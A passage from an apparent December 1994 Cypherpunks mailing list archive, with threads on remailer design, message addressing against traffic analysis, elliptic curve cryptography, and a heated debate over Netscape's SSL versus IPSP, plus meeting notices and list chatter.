   they interface with the Windows Sockets API to establish TCP
   streams that are used in the POP and SMTP protocols. Since these
   are well known and standardized protocols, this gives us our
   toehold.

How might an interposed winsock DLL recognize what high level protocol it was going to spoof? Getting the port number will be a very good approximation, but I'm not convinced of its reliability.

As to the general issue of MSWindows v. Unix, the Unix predominance for remailer software involves the fact that Unix is on the bulk of the machines connected to the Internet. It's more reliable for offering network services than MSWindows and it's got a cleaner architecture for reconfiguration. None of these explanations, however, means that there won't be more MSWindows than Unix boxes for a long time.
Eric

From lcottrell at popmail.ucsd.edu Mon Dec 12 22:59:03 1994
From: lcottrell at popmail.ucsd.edu (Lance Cottrell)
Date: Mon, 12 Dec 94 22:59:03 PST
Subject: Broadcasts - addressing
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>> I have been contemplating how to mark broadcast messages as being
>> 'for' someone. To foil traffic analysis, you don't want to include
>> their nym or key-id, for the sake of your poor CPU, you want to
>> avoid the need to attempt decryption on everything that passes through.
>
>The main problem is how to avoid decrypting _most_ of the traffic,
>without giving away significant information about the recipient.
>One approach is to do something some political users have been asking for -
>implement support for very short keyids (e.g. 4 bits instead of 24-32),
>so that the keyid isn't a good identifier for the user.
>Another approach is to include a tag in the Subject: with either a hash
>of the key (substantially reducing the number of bits),
>or simply the last hex or two of the keyid - that lets you ignore
>15/16th or 255/256th of the traffic, without giving away much.

I am not completely clear on what sort of communication you are trying to protect, and what your threat model is. Are you worried about an attacker noticing that an anonymous ID is getting a lot of messages? If you are using PGP and a message pool, any attacker can decrypt all the messages, and see which correspond to which key, and therefore to which anonymous ID. The only way around this is to use private key crypto. If you are doing that, then you can also use a shared secret to generate a stream of one use message IDs.
--------------------------------------------------
Lance Cottrell who does not speak for CASS/UCSD
loki at nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come."
--Nietzsche

From jamesd at netcom.com Mon Dec 12 23:01:35 1994
From: jamesd at netcom.com (James A. Donald)
Date: Mon, 12 Dec 94 23:01:35 PST
Subject: BofA+Netscape
In-Reply-To: <9412130628.AA14196@tadpole.tadpole.com>
Message-ID: <199412130701.XAA13876@netcom4.netcom.com>

Doug Barnes writes
> 2) Internet standards are set by the participants in
> the internet. They move much more quickly than any
> other standards body I've had the (mis)fortune of
> dealing with, the standards are open and freely available,
> and free reference implementations are required.

The reason the internet standards process works so well is because there is usually no money involved.

On this matter, there is money.

Every example I gave, where the standards setting process failed, is because lagging players want bad standards. It is in their financial interest.

Secondly, the Internet Standards process is itself a substitute for the marketplace in a non money environment. Netscape is working in the real marketplace.

--
---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.
James A. Donald
jamesd at netcom.com

From db at Tadpole.COM Mon Dec 12 23:24:29 1994
From: db at Tadpole.COM (Doug Barnes)
Date: Mon, 12 Dec 94 23:24:29 PST
Subject: What, exactly is elliptic encryption?
In-Reply-To: <199412130621.AAA07346@pentagon.io.com>
Message-ID: <9412130723.AA14508@tadpole.tadpole.com>

>
>
> What, exactly is elliptic curve encryption?
>

Exponentiation-based ciphers such as Diffie-Hellman use the fact that discrete logarithms are hard, but modular exponentiation is easy. So we quickly compute:

    x^y mod n (where n is prime)

But not:

    log_x(x^y mod n) mod n

Think of the numbers between 0 and n-1 as a group that work sort of like all Integers taken as a whole. Because they do have many of these properties, this makes these numbers an "abelian" group. So we can use some old properties from arithmetic such as:

    (a * b * c) mod n == (((a * b) mod n) * c) mod n

With an elliptic curve, such as y^2 = x^3 - x, you can define a set of coordinates {, ... } that are on the curve, where all x and all y are in a group like we use for Diffie-Hellman. For the different isomorphisms of the curves, you can then construct addition of coordinates, subtraction, multiplication and division, such that the results are also points on the curve. This makes this set of points an abelian group too.

You can then do a Diffie Hellman analogue substituting multiplication for exponentiation, and an El Gamal analogue substituting multiplication for exponentiation and addition for multiplication.

I have just recently been researching this subject, but I can provide some references tomorrow, if people are interested. I have found what appears to be an implementation of some of the arithmetic in a package called "pari", but I haven't had a chance to look at it closely. There are no p.d. elliptic curve _cryptography_ implementations that I'm aware of, which is something I'd like to see change...
:-)

There is an IEEE group working on a proposed standard at the moment; I need to get back to my contact with them to find out where they are at now. Most of the work in this area is being done by smart card people, because ec's seem to give you more bang for your buck in terms of modulus size, etc.

Hope this helps.

Doug

From lcottrell at popmail.ucsd.edu Mon Dec 12 23:28:22 1994
From: lcottrell at popmail.ucsd.edu (Lance Cottrell)
Date: Mon, 12 Dec 94 23:28:22 PST
Subject: Standard Packet size.
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I am about to release Mixmaster as a beta test. Before I do, I would like some input on what size message packet to standardize on. Each message includes twenty 1k headers, and a block with the message text. Right now I have the text block size set to 4k. That seems small, but I am worried about mail systems choking on big messages.

Messages over the minimum size are sent separately (through the same chain), and only recombined by the last remailer in the chain. Previous remailers do not know that the message parts are associated. This is quite secure, but not as good as a single packet, so the fewer messages that get split up, the better. Mixmaster compresses the contents of the text block.

So, any thoughts on what size the text block should be?

BTW Mixmaster still only runs on Sun. Several people are working on porting it to linux. Help with porting to PC and Mac would be appreciated.

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell who does not speak for CASS/UCSD
loki at nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche

From hfinney at shell.portal.com Mon Dec 12 23:29:30 1994
From: hfinney at shell.portal.com (Hal)
Date: Mon, 12 Dec 94 23:29:30 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412122322.AA11307@snark.imsi.com>
Message-ID: <199412130729.XAA01473@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

It is nice to have a lot of people on the list from Netscape. Here is a question about SSL relating to the use of certificates:

+ The issuer name must resolve to a name that is deemed acceptable by the application using SSL. How the application using SSL does this is outside the scope of this memo.

What does Netscape actually do about this? If I want to make a server which will interoperate with existing Netscape clients what kind of certificate do I need, and what kind of name should be in there?

Thanks -

Hal Finney
hfinney at shell.portal.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

From lmccarth at ducie.cs.umass.edu Mon Dec 12 23:29:33 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Mon, 12 Dec 94 23:29:33 PST
Subject: James vs. Eric
Message-ID: <199412130734.CAA29659@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Eric
# Perhaps you don't know the meaning of whitespace and paragraph breaks.

James
> And then he contradicts himself:

# I did claim you were arguing from libertarian correctness. Now that's
# just an insult, which I do not retract.
[...]
# Oh, please. Go back and read what I originally wrote.
Perhaps I
# overestimate your ability to ascertain relevance, though.

> You do not demonstrate much ability to think rationally
> in this posting. A self contradiction in three lines,
> above, and some interesting logic to follow:
[...]
# This is not an argument. This is a premise.

> I see: So you start off with the assumption that what
> I was arguing was false, and because that is a premise
> not an argument, you do not have to defend it or support it.

"I do not need to PROVE these FACTS because they are INCORRECT and because I do not NEED to PROVE them they must be TRUE!!!" --James `Kibo' Parry, 2/22/94

> Nice piece of logic there.
> I accused you of flaming before reading. Now you claim
> that you did read it, but the laws of logic exempt you
> from having to make rational criticism of what I wrote.
> I think your defense denigrates you more than my original
> accusation did.
> Now back to some slight crypto relevance:
[...]

*heavy sigh* Eric & James, how about taking the "You're flaming me !" "No, I'm just insulting you !" portion of this debate to private email ? I sincerely doubt that very many people on the list give a damn about any of the above jousting.

> Each posting I made was about the standards making process.

Sticking to flaming about Internet standards, rather than flaming about who didn't read whose argument carefully, would be much more productive IMHO.

- - -L. Futplex McCarthy; PGP key by finger or server
"We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.
A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From Tony.Gurnick at nzdairy.co.nz Mon Dec 12 23:42:09 1994
From: Tony.Gurnick at nzdairy.co.nz (DNA)
Date: Mon, 12 Dec 94 23:42:09 PST
Subject: New zealand meetings?
Message-ID: <94121320401594@nzdairy.co.nz>

Do any of the kiwis on the list want to start some sort of informal meeting, (at georgie pie?) as going to the states for their meetings is a tad difficult. (all 5 of us that is)

T

From db at Tadpole.COM Mon Dec 12 23:50:25 1994
From: db at Tadpole.COM (Doug Barnes)
Date: Mon, 12 Dec 94 23:50:25 PST
Subject: Broadcasts - addressing
In-Reply-To:
Message-ID: <9412130749.AA14735@tadpole.tadpole.com>

>
> I am not completely clear on what sort of communication you are trying to
> protect, and what your threat model is.

Let's say that agent-in-place X posts to his controller whenever something of political significance happens in Foobarvia. A clever traffic analyst will notice that a certain key posts to alt.anonymous (or contributes to the pool, whatever it is) whenever something big happens in Foobarvia. Conclusions can be drawn -- there is a PGP-using spy in Foobarvia! By carefully limiting access to news tidbits, they can use process of elimination to find the spy. (In reality, it could be much more mundane -- every time Peggy Sue tells Mary Beth a secret, there is a post by the same keyid, etc.)

However, if you use a public-key encryption scheme that doesn't store the key-id on the outside of the packet (or store it at all), then you are at liberty to identify the packets for decryption by the target recipient however you want.
I've suggested an approach using tokens, which make all the messages from agent-in-place X unlinkable to one another (thus hindering the detection of the aforementioned pattern), while still allowing the recipient to sniff for them efficiently.

>
> Are you worried about an attacker noticing that an anonymous ID is getting a lot
> of messages? If you are using PGP and a message pool, any attacker can decrypt
> all the messages, and see which correspond to which key, and therefore to which
> anonymous ID. The only way around this is to use private key crypto. If you are
> doing that, then you can also use a shared secret to generate a stream of one
> use message IDs.

Clearly this involves using something other than vanilla PGP, or running some post- and pre- processing to delete and then add back in the key-id. The mandatory external presence of the key-id has always been less than optimal, IMHO.

From Agorist003 at aol.com Mon Dec 12 23:51:58 1994
From: Agorist003 at aol.com (Agorist003 at aol.com)
Date: Mon, 12 Dec 94 23:51:58 PST
Subject: L.A. cpunx meeting
Message-ID: <941213025205_4686155@aol.com>

-----BEGIN PGP SIGNED MESSAGE-----

Yep, still hosting the weekly L.A. Cypherpunks gathering at the:

California Coffee House
4455 Overland Avenue
Culver City, CA 90230
(310) 559-8868

Defend Your Privacy! from: "Big Brother" Government and "Dark Side" Hackers
- ----------------
L.A. Cypherpunks

Help create an "Infotopia," don't support an "Automatic Gestapo." Fight the Clipper "Snitch Chip."

Drop in any time between 12 & 5PM Saturdays (excluding holidays). Let's plot and conspire, or at least exchange PGP key fingerprints. Tune Out (media lies), Turn Off (freeway), and Drop In (for coffee). Share information and sell stuff if you wish.

I'm trying to get political types to show up, in addition to us computer geekazoids. Show up and get the latest brochure! I'll be there this Saturday, but not the 24th and possibly not in early January (I did say "excluding holidays").
But don't let that stop you unless the coffee house is closed.

Kent - jkh at story.com (not yet) or agorist003 at aol.com

-----BEGIN PGP SIGNATURE-----
Version: 2.3
-----END PGP SIGNATURE-----

From eric at remailer.net Mon Dec 12 23:54:42 1994
From: eric at remailer.net (Eric Hughes)
Date: Mon, 12 Dec 94 23:54:42 PST
Subject: BofA+Netscape
In-Reply-To: <199412130652.WAA12984@netcom4.netcom.com>
Message-ID: <199412130852.AAA01537@largo.remailer.net>

From: jamesd at netcom.com (James A. Donald)

----------------------
1. Plain talk.

you wrote:
> This is not an argument. This is a premise.

I see: So you start off with the assumption that what I was arguing was false, and because that is a premise not an argument, you do not have to defend it or support it.

You claimed that what you were saying was my argument. I pointed out that it wasn't an argument at all, that it was merely a premise for an argument.

Pardon me, though, for assuming that you know the difference between a deduction and an assertion. What you summarized was merely an assertion. A deduction has some sense of the word "therefore" in it. What you summarized did not.

Perhaps you thought you were summarizing the conclusion of my argument, which would have the form of an assertion. But if you were doing that, then you really did confuse an argument with its conclusion.

Now, let me be perfectly clear here. I quote your summary just to make sure:

> > The short of your argument is that Netscape will fragment the
> > net by running out there and dumping something in the market
> > place without consensing with all the big boys.

This was a premise of my argument.
Since you managed to restate one of my premises, I now know that you are capable of taking letters of text and forming them into coherent sentences. What you have not yet demonstrated is the capacity for taking _all_ the letters of text and attempting an understanding of a complete position.

----------------------
2. Typographically Challenged.

Eric Hughes replies:
> Perhaps you don't know the meaning of whitespace and paragraph breaks.

And then he contradicts himself:

> I did claim you were arguing from libertarian correctness. Now that's
> just an insult, which I do not retract.

Aren't we dense today?

Paragraph 1: Insult
Paragraph 2: Argument

Whitespace and line breaks are used as thematic separators. Let me use very small words now: The first paragraph was about one thing, and the second paragraph was about something else. There was a blank line between the two which means that these two things are not like each other.

----------------------
3. Semper Fidelis.

I accused you of flaming before reading. Now you claim that you did read it, but the laws of logic exempt you from having to make rational criticism of what I wrote.

I asked you to summarize what you thought I meant. I no longer believe that you're making a good faith effort to talk about the same thing, so I wanted at least to try to make explicit the lack of agreement about each other's positions.

Personally, I think it's a waste of time to discuss a topic where there's not basic agreement on the other's position. Were it not for the fact that you continue to address the actual issue after insults of your own, I would have already ignored this thread.

----------------------
4. Striving to think.

I argue that good standards are created by victory in the market place, and bad standards are made by committees and consensus.

Without altering the denotation of the sentence I can interpret this as "all good standards" and "all bad standards". Well, that sounds like an example of Libertarian Correctness to me.
The flies in the market place _uber alles_!

You argue game theory that would be valid given your premise that cooperation works in this case.

You are seriously misrepresenting my position in this restatement.

First, you will not distinguish between a simple indicative and a modal form. What I was pointing out is that it's not clear that cooperation doesn't work, i.e. it may work. "May" here is the modal form.

Second, you will not distinguish an implication from its converse. I argued that, given plausible game-theoretic assumptions, that the best outcome is cooperation. Game theory is the premise; cooperation is the conclusion.

Mind you, I'm talking to the _rest_ of the list here.

----------------------
5. In the boat with Chomsky.

And now The Amazing James, reader of minds, will tell me what I really meant to say:

Your so called "game theory" is just code for the moral assumption that Netscape are wicked not to engage in consensus.

De mortuis mentis, nil nisi Latinum.

----------------------
6. A tip: avoid auctions.

You do not reason using game theory, you use it as a code to express moral claims without having to justify them.

James Donald asked me what iterated dominance was a couple of weeks ago.

James, do you know _anything_ about game theory? Anything at all?

Eric

From pfinerty at seattleu.edu Mon Dec 12 23:57:25 1994
From: pfinerty at seattleu.edu (being)
Date: Mon, 12 Dec 94 23:57:25 PST
Subject: dr. dobbs - where?
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

i'd like to know where i can find dr. dobbs. i came up with a lot of stuff (52 hits actually) using gopher but i'd prefer some sort of mailing list or even better, a WWW page for it. of course, if there is a std ftp site i'd go for that as well. basically, i'm easy to please. i just want to read the crypto articles mentioned by bruce.

life, you see, is not meant to be enjoyed. -me right now
pfinerty at bach.seattleu.edu
finerty at msscc.med.utah.edu
finger any acct.
for pgp key
pfinerty at nyx10.cs.du.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From eric at remailer.net Tue Dec 13 00:06:13 1994
From: eric at remailer.net (Eric Hughes)
Date: Tue, 13 Dec 94 00:06:13 PST
Subject: What, exactly is elliptic encryption?
In-Reply-To: <9412130723.AA14508@tadpole.tadpole.com>
Message-ID: <199412130903.BAA01594@largo.remailer.net>

From: db at Tadpole.COM (Doug Barnes)

For the different isomorphisms of the curves, you can then construct addition of coordinates, subtraction, multiplication and division, such that the results are also points on the curve. This makes this set of points an abelian group too.

Well, you actually get just addition and subtraction as binary operations. Multiplication is integers by elliptic curve elements and is shorthand for multiple additions. Division doesn't always make sense.

You can then do a Diffie Hellman analogue substituting multiplication for exponentiation, and an El Gamal analogue substituting multiplication for exponentiation and addition for multiplication.

The multiplication takes an integer (the exponent analogue) by a curve element (the base analogue).

There is an IEEE group working on a proposed standard at the moment; I need to get back to my contact with them to find out where they are at now.

Burt Kaliski of RSA Labs is the chair of P1363. Archives are at rsa.com.

Eric

From tcmay at netcom.com Tue Dec 13 00:44:34 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Tue, 13 Dec 94 00:44:34 PST
Subject: dr. dobbs - where?
In-Reply-To:
Message-ID: <199412130844.AAA10371@netcom18.netcom.com>

being wrote:

> i'd like to know where i can find dr. dobbs. i came up with a lot of stuff
> (52 hits actually) using gopher but i'd prefer some sort of mailing list or
> even better, a WWW page for it.
of course, if there is a std ftp site i'd go
> for that as well. basically, i'm easy to please. i just want to read the
> crypto articles mentioned by bruce.

i wondered the same thing for a long time, looking with archie for this item, and another, something called "scientific american" that gets quoted a lot (but isn't a scientific american an oxymoron? I guess not)

i finally found this dr. dobbs in a place called a bookstore...imagine that. it seems that dr. dobbs is a magazine, a relic printed on either papyrus or paper, i'm not sure which. it used to be called "dr. dobbs journal of computer orthodontia: running light without overbyte" (or words to that effect).

the immortal jim warren, who has attended at least two cypherpunks meetings and who founded various important computer trade shows (which he sold to others, thus ensuring his life of retirement), founded this "magazine" in the mid-70s, which explains why it uses such an archaic format as papyrus (or is it paper?).

seriously, byte, dr. dobbs, scientific american, and the economist are available only in paper form, but are nonetheless vastly more useful than nearly anything on the net. this is especially true, of course, of the crypto literature, where vast amounts of goodness are confined to cellulose.

it may change in our lifetimes, perhaps even in my lifetime. not surprising to this group, payment for electronic forms is an issue.

--klaus! von future prime

From marca at mcom.com Tue Dec 13 00:58:01 1994
From: marca at mcom.com (Marc Andreessen by way of marca@mcom.com Marc Andreessen)
Date: Tue, 13 Dec 94 00:58:01 PST
Subject: Clarification of my remarks about Netscape
Message-ID: <199412130858.IAA10735@neon.mcom.com>

In article <9412121811.AA55359 at amanda.dial.intercon.com>, amanda at intercon.com (Amanda Walker) wrote:

> > As for the IETF standards process, we are pushing the
> > document into the RFC process.
>
> Precisely.
Rather than working with others in the industry and research
> communities, you are trying to push your proposal into the standards track.

Amanda, we're not trying to push anything into the standards track. We're publishing SSL as an informational RFC, and we have separately submitted SSL as a proposal to the W3O working group on security (in parallel with SHTTP and a handful of other proposals). Nothing is being pushed into the standards track.

We are trying to work with others in the industry and research communities, via the above actions, by publishing SSL on our server, by participating in this forum and others, etc., and we are generally succeeding, judging from the overall high level of feedback we're getting from people genuinely interested in discussing the issues.

Marc

--
Marc Andreessen
Netscape Communications Corp.
Mountain View, CA
marca at mcom.com

From marca at mcom.com Tue Dec 13 00:58:24 1994
From: marca at mcom.com (Marc Andreessen by way of marca@mcom.com Marc Andreessen)
Date: Tue, 13 Dec 94 00:58:24 PST
Subject: Clarification of my remarks about Netscape
Message-ID: <199412130858.IAA10739@neon.mcom.com>

In article <199412130318.TAA00912 at largo.remailer.net>, eric at remailer.net (Eric Hughes) wrote:

> From: "Kipp E.B. Hickman"
>
> If this hadn't been made clear already, then hopefully this will:
>
> Our intention is to support any development effort attempting
> to implement an SSL conformant implementation. We will work with
> you to repair the spec as needed to eliminate any errors or
> omissions, and help you test your implementation to ensure that
> it interoperates with ours.
>
> It's clear to me. "We're going to use some security, as long as it's
> called SSL and our authorship is on the document."

No, he didn't say that -- you're jumping to conclusions based on a statement he's making on a separate topic.
We're going to support security mechanisms as they are required and accepted by the market -- functionality, protocols, formats, etc. -- whether or not they are called SSL and whether or not our authorship is on the document.

Marc

--
Marc Andreessen
Netscape Communications Corp.
Mountain View, CA
marca at mcom.com

From marca at mcom.com Tue Dec 13 00:58:54 1994
From: marca at mcom.com (Marc Andreessen by way of marca@mcom.com Marc Andreessen)
Date: Tue, 13 Dec 94 00:58:54 PST
Subject: IPSP and Netscape
Message-ID: <199412130859.IAA10748@neon.mcom.com>

In article <199412130302.TAA00871 at largo.remailer.net>, eric at remailer.net (Eric Hughes) wrote:

> ... the claims that SSL is better than anything
> else out there

I'm sorry, I don't remember such a claim being made.

> ... The original denial of IPSP's
> potential utility

Likewise, I don't recall anyone denying IPSP's potential utility (particularly with emphasis on *potential*).

Marc

--
Marc Andreessen
Netscape Communications Corp.
Mountain View, CA
marca at mcom.com

From ddt at lsd.com Tue Dec 13 01:44:02 1994
From: ddt at lsd.com (Dave Del Torto)
Date: Tue, 13 Dec 94 01:44:02 PST
Subject: THREAD X: subject y
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

"And Now, For Something Completely Different"

I wish all subject fields in msg headers had two parts:

1. the THREAD being referred to.
2. the SUBJECT of that particular msg.

That way, I might be able to follow some of these discussions better.

Sure, I can hear you saying it right now: "Jeeze, Dave, dontchaknow MIME can do that?" Sure, but we all know that's beside the Real Issue. We on this list once, looong ago, experimented with META: prefixes to do this, but no one here (or anywhere, to be fair) seems disciplined enough to stick to this.

I don't have any proposal anymore. I gave up on trying to fix the world a long time ago. I just struggle along with everyone else and occasionally whine a bit to my Congressperson.
No that's a lie: I'm MAD as hell and I'm not gonna take it anymore! Yeah! That's it!

dave
_________________________________________________________________________
"You can put your shoes in the oven, but that don't make 'em biscuits."

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

From HSAID at cairo.eun.eg Tue Dec 13 03:28:15 1994
From: HSAID at cairo.eun.eg (HSAID at cairo.eun.eg)
Date: Tue, 13 Dec 94 03:28:15 PST
Subject: subscription terminstion
Message-ID: <01HKLHEHFPB6006HMI@FRCU.EUN.EG>

please i want to terminate my subscription in your group because i have small quota.

From Steve_Gibson at bionomics.org Tue Dec 13 04:31:24 1994
From: Steve_Gibson at bionomics.org (Steve Gibson/Bionomics)
Date: Tue, 13 Dec 94 04:31:24 PST
Subject: Bionomics Institute -- New discussion group and newsletter
Message-ID: <9412131430.AA2066@notes.worldcom.com>

How is new technology transforming the economy? How will it alter the fundamental qualities of economic life?

We don't have all the answers. But we do have a powerful new way to look at the revolutionary changes brought about by the emergence of the Information Age. And, we have leading edge thinkers and doers from a remarkable variety of disciplines -- high-technology, biology, economics, public policy, business and more -- who share the powerful idea that the economy is an ecosystem.

That's right: the economy is _not_ some giant machine. It's like a rainforest. A virtual rainforest where coded information, like DNA, defies entropy. Where organizations (like organisms) cooperate, compete and evolve in a complex, self-organizing process that is not only unplanned, but unplan-able. (Sounds like the Internet, doesn't it.)

And, now, we have a discussion group: evolve at bionomics.org.
As well as an occasional newsletter: just.the.facts at bionomics.org.

JOINING -- send to info at bionomics.org with "SUBSCRIBE Evolve" or "SUBSCRIBE Just.the.facts" in the subject line. Participants in "Evolve" will get "just.the.facts" automatically.

CONTRIBUTING -- send to evolve at bionomics.org. This is an archived, quasi-moderated discussion. Signal-to-noise will be kept high.

VANISHING -- send "unsubscribe" or any questions to info at bionomics.org or to our domain postmaster, klacobie at bionomics.org.

This message comes to you because either we read this list or people keep telling us it's right up our alley. Now we want you to come explore the truths and consequences of the infoweb with us. And bring your friends. (If you don't have any friends, you're probably spending too much time reading email.)

You made it this far... hit and take a lurk. Become a part of the bionomic community, where high-technology and the free-market converge.

Regards,

Steve Gibson
Executive Director
The Bionomics Institute

From perry at imsi.com Tue Dec 13 06:29:38 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 13 Dec 94 06:29:38 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <199412130436.UAA26914@netcom4.netcom.com>
Message-ID: <9412131428.AA12085@snark.imsi.com>

James A. Donald says:
> But reality is that they have produced by far the coolest browser
> there is, and they are bringing crypto to the masses, and you,
> and Eric Hughes, and most of us, have not yet brought crypto
> to the masses.
>
> Give them credit for doing what we have talked of doing, but
> have not actually done.

You claim we haven't done anything and Netscape has.

ftp.csua.berkeley.edu has the swIPe code sitting right on it. It's being deployed by TIS in their new firewall products, and is being used by others.
I could have conducted the full PR campaign to get people using it, but have chosen not to because I don't want to have to later sell them on an (incompatible) IPSP packet format (which is superior). I'm already working on hacking swIPe into IPSP.

Netscape looks foolish because they don't bother to look at other people's work. I won't comment on you.

Perry

From perry at imsi.com Tue Dec 13 06:31:39 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 13 Dec 94 06:31:39 PST
Subject: James Donald's comments
Message-ID: <9412131431.AA07769@webster.imsi.com>

James Donald has claimed that I've been talking about vaporware and that Netscape has produced "real cool crypto for the masses". As I've noted, real code to implement proposals quite similar to IPSP is out there right now, and has been for half a year. The reason that it isn't very widely deployed is largely because we haven't been pushing it because it isn't fully clean yet, not because it couldn't be used. (It is indeed being used by real people with real applications).

.pm

From perry at imsi.com Tue Dec 13 06:43:12 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 13 Dec 94 06:43:12 PST
Subject: BofA+Netscape
In-Reply-To:
Message-ID: <9412131442.AA12105@snark.imsi.com>

Marc Andreessen says:
> >I told you in Email, Mr. Andreessen, that new transport level security
> >protocols are useless now that IPSP has come near to standardization
> >and now that prototype implementations are nearly available.
>
> Great, IPSP looks fantastic and we look forward to supporting it
> as it moves through and beyond the "near" phase.

Given that you haven't read any IPSP documents, I can only interpret your comments as sarcasm. If they aren't sarcasm, they represent more of the same "why bother to do any research" attitude that got you into trouble in the first place.
When I wrote you mail explaining that solutions on top of the transport layer were becoming rapidly obsolete, you dismissed me off hand, not even having bothered to check the literature on the subject.

I don't mind an informed discussion in which individuals like yourself say things like "I don't like the encapsulation formats proposed in IPSP because they don't give me enough flexibility to do X" or things of that nature. I wouldn't mind a "we examined IPSP and found it lacking". However, you didn't even bother to look at anything I mentioned. You dismissed it without knowing what it was. Your fellows seem so ignorant on the subject that they think that network layer security requires changes to the routing infrastructure (it does not -- it can even be implemented at user level using BPF or NIT, though I don't recommend that.)

The thing I find truly outrageous about the Netscape crowd is that you apparently did some navel staring, came up with an idea for internet security, and proceeded to go off and do it. Not for one moment did you consider the possibility that others might have already done something worth looking at, or that it might even be already developed and on its way to standardization.

Perry

From perry at imsi.com Tue Dec 13 06:45:56 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 13 Dec 94 06:45:56 PST
Subject: IPSP and Netscape
In-Reply-To: <199412130551.VAA10080@islay.mcom.com>
Message-ID: <9412131445.AA12113@snark.imsi.com>

John Giannandrea says:
>
> Eric Hughes writes:
> > It may be that IPSP is not the quickest or best way to link
> > security, but that is not the point I am making here. The
> > original denial of IPSP's potential utility was made in
> > complete ignorance
>
> Widespread acceptance of IPSP may well make SSL irrelevant.
> I do not believe that anyone at Netscape is claiming otherwise.
>
> Nonetheless, widespread implementation of IPSP simply does not exist
> at this time. We need a solution for our customers _today_.

Fine.
Widespread implementation of SSL doesn't exist, either. You can probably deploy IPSP to the bulk of your customers just as fast. The effort is no different, and the results are better. Now, maybe I'm wrong -- but how would you guys know, not having even examined the literature?

> I do not believe that we are either arrogant nor ignorant in creating SSL.

Since you didn't bother to even examine the other alternatives, I'd say you were ignorant. Since you refused to listen when this was pointed out, I'd say you were arrogant.

Perry

From perry at imsi.com Tue Dec 13 06:47:38 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 13 Dec 94 06:47:38 PST
Subject: What, exactly is elliptic encryption?
In-Reply-To: <199412130621.AAA07346@pentagon.io.com>
Message-ID: <9412131447.AA12121@snark.imsi.com>

dfloyd at io.com says:
> What, exactly is elliptic curve encryption?

Basically, there are ways of extending public key methods into fields other than the integers modulo some prime -- you can also perform these methods in fields based on so-called elliptic curves, and when you do it turns out that there are certain speed benefits.

Perry

From avi at clas.ufl.edu Tue Dec 13 06:48:50 1994
From: avi at clas.ufl.edu (Avi Harris Baumstein)
Date: Tue, 13 Dec 94 06:48:50 PST
Subject: the netscape/ssl controversy
Message-ID: <199412131448.JAA07613@cutter.clas.ufl.edu>

have to get my two cents in:

netscape has a proposal that secures the *transport* of files. pgp and the like secure the actual files themselves. the question that will have to be answered is "which method of security is more valuable to the internet as a whole?" of course i have made up my mind, but i'll waste some space and share those thoughts here.

i sit on a committee at the college of agriculture here at uf, where we are discussing how to implement the web. many of these people come from bureaucratic and publishing (the college publishes lots) backgrounds. they want control and accountability.
they don't want someone to download some chemical information, believing that it is correct (as certified by the university), but in actuality that information was forged.

i (and a few others) brought up digital signatures as a way of guaranteeing authenticity of documents. but this would be an awful pain to implement, simply because the products do not support it. ssl can not provide this. ssl can guarantee that the document was not modified from the server it originated from until i got it. but who is to say that the server i got it from was the authoritative server?

that's merely one example of where ssl provides no added benefit, but other encryption technologies do.

so what is a better solution?

i would choose a mime multipart using pgp or some other cryptographic method. if integrated into the web client, it could be just as seamless to the user, but now instead of encrypting the link between two computers, it encrypts (or signs) the document itself, since that's what i'm really interested in anyway (is the document). i could care little about the link - and that's the premise of the internet, that the link is unimportant as long as it works.

so while ssl may well be a wonderful protocol, it does not address the problems that many cypherpunks see as being real. i think it would do netscape good to listen to and consider the views of many on this list, as they have many genuinely good ideas, even if they choose a confrontational manner.

-avi

From michael.shiplett at umich.edu Tue Dec 13 07:20:59 1994
From: michael.shiplett at umich.edu (michael shiplett)
Date: Tue, 13 Dec 94 07:20:59 PST
Subject: dr. dobbs - where?
In-Reply-To:
Message-ID: <199412131520.KAA21199@truelies.rs.itd.umich.edu>

"b" == being writes:

b> i'd like to know where i can find dr. dobbs.

ftp://ftp.mv.com/pub/ddj contains some of the code published in the magazine. for the articles (and the rest of the code), you'll need to stop by a magazine stand or library.
michael

From perry at imsi.com Tue Dec 13 07:35:42 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 13 Dec 94 07:35:42 PST
Subject: IPSP and Netscape
In-Reply-To: <199412130859.IAA10748@neon.mcom.com>
